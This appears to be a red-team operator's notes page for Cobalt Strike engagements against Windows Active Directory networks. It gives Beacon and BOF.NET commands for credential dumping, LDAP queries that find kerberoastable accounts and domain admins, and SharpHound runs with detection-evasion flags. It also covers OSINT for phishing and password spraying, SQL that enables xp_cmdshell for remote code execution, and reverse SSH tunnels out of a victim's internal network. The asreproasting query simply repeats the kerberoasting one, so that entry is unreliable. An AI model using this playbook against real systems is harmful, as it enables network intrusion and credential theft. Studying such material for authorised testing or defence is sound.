Not a definitive list, cheatsheet, or opsec safe by any means, just things of note....
Several enumeration techniques are picked up by defenses (including sharphound collectors), especially LDAP queries with asteriks like attribute=*. Iterative lookups are usually better, if you know what I mean.
- TrustedSec's Situational Awareness BOFs
- ajpc500's BOFs
- Raphael Mudge's Unhook BOF
- EncodeGroup's SAM - SYSTEM - SECURITY Dump BOF
- rookuu's MiniDumpWriteDump BOF
All assemblies should be run through BOF.NET.
In Beacon terminal:
bofnet_initbofent_load /Path/To/Assembly.exebofnet_executeassembly ASSEMBLYNAME -arg1 VALUE -arg2 VALUE
- OSINT (Passive)
- Whois company, what do they do or specialize in
- Find out what the company atmosphere is like (use company review sites like Glassdoor)
- ASN Lookups
- DNS Recon (amass, subfinder, crt.sh,certspotter DNS Zone transfers, etc), including MX/SPF etc
- Shodan
- Company email format (first.last, flast, etc -> find on hunter.io)
- Code repository recon (github, gitlab, bitbucket, etc) using truffleHog, git-secrets, etc
- Perform AWS bucket and/or Azure blob enumeration using tools such as MicroBurst and inSp3ctor.
- Harvest employee names (use theHarvester and/or Linky with keyword searches) and curate list with company email format
- (Used for phishing and/or password spraying)
- (Active)
- Nmap IPs/Domains for list of systems online and any open ports
- Take note of any management ports externally accessible
- Identify any web apps (Eyewitness/Aquatone)
- (Especially employee login portals to perform a password spray)
- Inspect web apps for comments or files hosted in amazon, azure, etc.
- Perform discovery of documents across live domains to extract MetaData from (PowerMeta, FOCA)
Get Domain Controllers
ldapsearch "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))"
Get all Domain Admins
ldapsearch "(&(objectCategory=group)(name=Domain Admins))"
Get Password Policy
ldapsearch "(&(objectClass=msDS-PasswordSettings))
Get specific User
ldapsearch "(&(objectCategory=person)(objectClass=user)(samaccountname=TARGETUSERNAME))"
Get specific Computer
ldapsearch "(&(objectCategory=Computer)(name=TARGETCOMPUTERNAME))"
Get all Groups
ldapsearch "(&(objectClass=group))"
Get all active (not disabled) Users
ldapsearch "(&(objectCategory=person)(objectClass=user)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
Get all active (not disabled) Computers
ldapsearch "(&(objectCategory=Computer)(!userAccountControl:1.2.840.113556.1.4.803:=2))"
Get (not disabled) accounts with SPN set for kerberoasting
ldapsearch "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
Get (not disabled) accounts that do not require PREAUTH for asreproasting
ldapsearch "(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))"
Get Windows Servers
ldapsearch "(&(&(&(&(samAccountType=805306369)(!(primaryGroupId=516)))(objectCategory=computer)(operatingSystem=Windows Server*))))"
Get Users with passnotreq set
ldapsearch "(&(objectCategory=Person)(objectClass=User)(userAccountControl:1.2.840.113556.1.4.803:=32))"
All users with Password Never Expires set
ldapsearch "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))"
Others:
Localhost Enumeration Examples with Seatbelt.exe
bofnet_load /path/to/Seatbelt.exe
bofnet_executeassembly Seatbelt -group=user
bofnet_executeassembly Seatbelt -group=system
bofnet_executeassembly Seatbelt -group=all -full
Sharphound Collection Methods for BloodHound
bofnet_load /path/to/sharphound.exe
Run the following methods one at a time, mix up the order as desired:
bofnet_executeassembly Sharphound --CollectionMethod Group --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames
bofnet_executeassembly Sharphound --CollectionMethod Trusts --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames
bofnet_executeassembly Sharphound --CollectionMethod ACL --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames
bofnet_executeassembly Sharphound --CollectionMethod ObjectProps --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames
bofnet_executeassembly Sharphound --CollectionMethod Container --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames
bofnet_executeassembly Sharphound --CollectionMethod GPOLocalGroup --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames
If stuck and need to do Session and Localadmin collection, target specific systems of interest:
bofnet_executeassembly Sharphound --CollectionMethod Session,LocalAdmin --Domain TARGETDOMAIN --ComputerFile c:\path\to\target\systems.list --Jitter 20 --Throttle 2000 --NoSaveCache --RandomizeFilenames
Hunt for sensitive files, scripts, and plaintext credentials in accessible shares. Speed it up (can be loud) by using this amazing tool: Snaffler by l0ss.
MoveKit and the required two assemplies: SharpRDP + SharpMove.
Use the Service binpath modifcation technique (SCShell by Mr-Un1k0d3r)
Check if xp_cmdshell is enabled
SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name = 'xp_cmdshell';
Enable advanced options
EXEC('sp_configure ''show advanced options'', 1; reconfigure;');
Enable xp_cmdshell
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;');
RCE
exec master.sys.xp_cmdshell 'whoami'
HVT ports for some quick wins on discovered subnets (mostly when on an internal network)
- Java RMI:
1090,1098,1099,4444,11099,47001,47002,10999 - WebLogic:
7001-7004, 8000-8003,9000-9003,9503,7070,7071 - JDWP:
45000,45001 - JMX:
8686,9012,50500 - GlassFish:
4848 - jBoss:
11111,4444,4445 - Cisco Smart Install:
4786 - HP Data Protector:
5555,5556 - Apache Solr:
8983,8984
Backup CobaltStrike Logs
rsync -avzh -e "ssh -i /path/to/private.ky" root@TEAMSERVER:/path/to/cobaltstrike/logs/ /path/to/local/destination/folder
OR using your default $HOME/.ssh/id_rsa
rsync -avzh -e "ssh" root@TEAMSERVER:/path/to/cobaltstrike/logs/ /path/to/local/destination/folder
Create a tunnel at externally accessible middlebox and back to Kali. Run from Kali (on someones internal network maybe):
ssh root@middlebox -R 2022:localhost:22
Run on middlebox:
ssh root@localhost -p 2022
run on Kali:
ssh root@middlebox -R 2022:localhost:22
Run on your local system at home sitting behind firewall:
ssh -t root@middlebox -L 2023:localhost:2022 ssh -p 2022 root@localhost
BONUS: Access CobaltStrike or any other service running on Kali by running this on your local machine:
ssh -L 50050:localhost:50050 -p2023 root@localhost